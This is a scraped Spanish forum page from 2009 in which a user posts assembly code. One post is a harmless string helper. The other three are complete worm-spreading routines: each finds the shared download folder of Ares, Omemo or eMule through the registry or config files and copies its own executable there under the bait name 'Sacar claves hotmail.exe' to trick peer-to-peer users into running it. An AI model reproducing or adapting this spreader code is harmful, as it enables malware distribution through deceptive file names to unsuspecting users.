|
411
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 21 Junio 2009, 08:33 am
|
include 'win32ax.inc' .data dString db "i'm a string",0 .code start: stdcall fRight,dString,9 invoke MessageBox,0,eax,0,0 invoke ExitProcess,0' ;Funcion que emula la funcion Right de Visual Basic 6 proc fRight,pString,pLen push esi ebx edi ecx mov eax,[pLen] inc eax invoke GlobalAlloc,GPTR, eax mov esi,eax mov ebx,eax stdcall Len,[pString] sub eax,[pLen] mov edi,[pString] add edi,eax .bucle_: cmp [pLen] ,0 je .exit mov cl,byte[edi] mov byte[ebx],cl inc ebx inc edi dec [pLen] jmp .bucle_ .exit: mov eax,esi pop ecx edi ebx esi ret endp proc Len,cCadena ;Funcion que mide la cadena push ecx edi mov ecx,-1 mov edi,[cCadena] mov al,0 repnz scasb mov eax,ecx not eax dec eax pop edi ecx ret endp .end start
|
|
|
412
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 20 Junio 2009, 02:35 am
|
include 'win32ax.inc' entry start .code cName equ "Sacar claves hotmail.exe" ; Nombre con que nos copiaremos proc start locals lBuffer rb MAX_PATH lBuffer2 rb MAX_PATH lBuffer3 rb MAX_PATH endl stdcall Zerar,addr lBuffer,MAX_PATH stdcall LeerRegistro,HKEY_CURRENT_USER,"Software\Ares" , "Download.Folder",addr lBuffer .if eax = 0 jmp .exit .endif stdcall Zerar,addr lBuffer2,MAX_PATH invoke lstrlen,addr lBuffer stdcall HexToString,addr lBuffer,eax,addr lBuffer2 invoke lstrlen,addr lBuffer2 lea ebx,[lBuffer2] mov byte[ebx+eax],"\" mov ebx,MAX_PATH sub ebx,eax lea edx,[lBuffer2] inc eax add eax,edx stdcall Zerar,eax,ebx invoke lstrcat, addr lBuffer2,cName MOV EaX, [FS:30h] MOV EaX, [EaX + 10h] MOV EaX, [EaX + 3Ch] stdcall Zerar,addr lBuffer3,MAX_PATH stdcall UniToAscii, addr lBuffer3,eax invoke CopyFile, addr lBuffer3, addr lBuffer2,0 .exit: invoke ExitProcess,0 endp proc UniToAscii, ascii, unicode push esi push edi mov esi, [unicode] mov edi, [ascii] .count: .if byte[esi] <> 0 movsb jmp .count .endif inc esi .if byte[esi] = 0 jmp .exit .endif jmp .count .exit: mov eax, edi add eax, 2 pop edi pop esi ret endp proc Zerar,Puntero,Cantidad ;Funcion que llena de 0 una posicion push ecx push ebx mov ecx,[Cantidad] mov ebx,[Puntero] .bucle: mov byte[ebx+ecx],0 loop .bucle mov byte[ebx],0 pop ebx pop ecx ret endp proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer locals temp dd ? Result dd ? endl mov [temp],MAX_PATH*3 invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result .if eax <> 0 ;Si no hay datos devolvemos 0 xor eax,eax jmp .salir .endif lea ebx,[temp] invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx .if eax <> 0 ;Si no hay datos devolvemos 0 xor eax,eax jmp .salir .endif mov eax,1 .salir: ret endp proc HexToString,cPuntero,cCantidad,cBuffer pushad mov edi,[cPuntero] mov esi,[cBuffer] .bucle: cmp [cCantidad] ,0 je .salir movzx eax,byte[edi] xor edx,edx mov ebx,16 div ebx mov ecx,edx .if byte[edi] >= 'A' add ecx,9 .endif xor edx,edx mov eax,16 mul ecx mov ecx,eax .if word[edi] = "C3" | word[edi]= "c3" mov byte[esi],"ó" add edi,4 inc esi sub [cCantidad],2 jmp .bucle .endif movzx eax,byte[edi+1] xor edx,edx mov ebx,16 div ebx .if byte[edi+1] >= 'A' add edx,9 .endif add ecx,edx mov byte[esi],cl inc esi add edi,2 dec [cCantidad] jmp .bucle .salir : popad ret endp section '.idata' import data readable library shlwapi,'shlwapi.dll',kernel32,'kernel32.dll' ,advapi32,'advapi32.dll',user32,'user32.dll' include 'api/kernel32.inc' include 'api/advapi32.inc' import shlwapi,PathFileExists,'PathFileExistsA' include 'api/user32.inc'
|
|
|
413
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 20 Junio 2009, 02:18 am
|
include 'win32ax.inc' entry start .code cName equ "Sacar claves hotmail.exe" ; Nombre con que nos copiaremos proc start locals lBuffer rb MAX_PATH lBuffer2 rb MAX_PATH lBuffer3 rb MAX_PATH endl stdcall Zerar,addr lBuffer,MAX_PATH stdcall LeerRegistro,HKEY_LOCAL_MACHINE,"SOFTWARE\Omemo" , "InstallDir",addr lBuffer .if eax = 0 jmp .exit .endif invoke lstrcat,addr lBuffer,"\Omemo.ini" invoke PathFileExists,addr lBuffer .if eax <> 0 stdcall Zerar,addr lBuffer2,MAX_PATH invoke GetPrivateProfileString,"global", "SAVE_AS_FOLDER", 0, addr lBuffer2, 260, addr lBuffer invoke lstrlen,addr lBuffer2 lea ebx,[lBuffer2] mov byte[ebx+eax],"\" invoke lstrcat, addr lBuffer2,cName MOV EaX, [FS:30h] MOV EaX, [EaX + 10h] MOV EaX, [EaX + 3Ch] stdcall Zerar,addr lBuffer3,MAX_PATH stdcall UniToAscii, addr lBuffer3,eax invoke CopyFile, addr lBuffer3, addr lBuffer2,0 jmp .exit .else jmp .exit .endif .exit: invoke ExitProcess,0 endp proc UniToAscii, ascii, unicode push esi push edi mov esi, [unicode] mov edi, [ascii] .count: .if byte[esi] <> 0 movsb jmp .count .endif inc esi .if byte[esi] = 0 jmp .exit .endif jmp .count .exit: mov eax, edi add eax, 2 pop edi pop esi ret endp proc Zerar,Puntero,Cantidad ;Funcion que llena de 0 una posicion push ecx push ebx mov ecx,[Cantidad] mov ebx,[Puntero] .bucle: mov byte[ebx+ecx],0 loop .bucle mov byte[ebx],0 pop ebx pop ecx ret endp proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer locals temp dd ? Result dd ? endl mov [temp],MAX_PATH*3 invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result .if eax <> 0 ;Si no hay datos devolvemos 0 xor eax,eax jmp .salir .endif lea ebx,[temp] invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx .if eax <> 0 ;Si no hay datos devolvemos 0 xor eax,eax jmp .salir .endif mov eax,1 .salir: ret endp section '.idata' import data readable library shlwapi,'shlwapi.dll',kernel32,'kernel32.dll' ,advapi32,'advapi32.dll',user32,'user32.dll' include 'api/kernel32.inc' include 'api/advapi32.inc' include 'api/user32.inc' import shlwapi,PathFileExists,'PathFileExistsA'
|
|
|
414
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 19 Junio 2009, 22:12 pm
|
include 'win32ax.inc' entry start .code cName equ "Sacar claves hotmail.exe" ; Nombre con que nos copiaremos proc start locals lBuffer rb MAX_PATH lBuffer2 rb MAX_PATH lBuffer3 rb MAX_PATH endl stdcall Zerar,addr lBuffer,MAX_PATH stdcall LeerRegistro,HKEY_CURRENT_USER,"Software\eMule" , "Install Path",addr lBuffer .if eax = 0 jmp .exit .endif invoke lstrcat,addr lBuffer,"\config\preferences.ini" invoke PathFileExists,addr lBuffer .if eax <> 0 stdcall Zerar,addr lBuffer2,MAX_PATH invoke GetPrivateProfileString,"eMule", "IncomingDir", 0, addr lBuffer2, 260, addr lBuffer invoke lstrlen,addr lBuffer2 lea ebx,[lBuffer2] mov byte[ebx+eax],"\" invoke lstrcat, addr lBuffer2,cName MOV EaX, [FS:30h] MOV EaX, [EaX + 10h] MOV EaX, [EaX + 3Ch] stdcall Zerar,addr lBuffer3,MAX_PATH stdcall UniToAscii, addr lBuffer3,eax invoke CopyFile, addr lBuffer3, addr lBuffer2,0 jmp .exit .else jmp .exit .endif .exit: invoke ExitProcess,0 endp proc UniToAscii, ascii, unicode push esi push edi mov esi, [unicode] mov edi, [ascii] .count: .if byte[esi] <> 0 movsb jmp .count .endif inc esi .if byte[esi] = 0 jmp .exit .endif jmp .count .exit: mov eax, edi add eax, 2 pop edi pop esi ret endp proc Zerar,Puntero,Cantidad ;Funcion que llena de 0 una posicion push ecx push ebx mov ecx,[Cantidad] mov ebx,[Puntero] .bucle: mov byte[ebx+ecx],0 loop .bucle mov byte[ebx],0 pop ebx pop ecx ret endp proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer locals temp dd ? Result dd ? endl mov [temp],MAX_PATH*3 invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result .if eax <> 0 ;Si no hay datos devolvemos 0 xor eax,eax jmp .salir .endif lea ebx,[temp] invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx .if eax <> 0 ;Si no hay datos devolvemos 0 xor eax,eax jmp .salir .endif mov eax,TRUE .salir: ret endp section '.idata' import data readable library shlwapi,'shlwapi.dll',kernel32,'kernel32.dll' ,advapi32,'advapi32.dll' include 'api/kernel32.inc' include 'api/advapi32.inc' import shlwapi,PathFileExists,'PathFileExistsA'
|
|
|
|
|
|
|